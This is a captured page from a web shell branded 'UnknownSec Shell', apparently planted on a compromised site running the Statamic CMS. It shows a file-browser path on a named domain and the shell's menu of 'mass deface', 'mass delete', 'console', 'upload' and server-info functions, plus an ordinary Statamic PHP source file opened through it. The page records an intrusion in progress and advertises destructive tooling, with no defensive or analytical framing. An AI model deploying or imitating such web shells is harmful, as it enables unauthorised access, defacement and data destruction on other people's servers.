shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Stache
/
Stores
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
SubmissionsStore.php
<?php namespace Statamic\Stache\Stores; use Statamic\Facades\Form; class SubmissionsStore extends AggregateStore { protected $childStore = FormSubmissionsStore::class; public function key() { return 'form-submissions'; } public function discoverStores() { return Form::all()->map(function ($form) { return $this->store($form->handle()); }); } }
© 2026 UnknownSec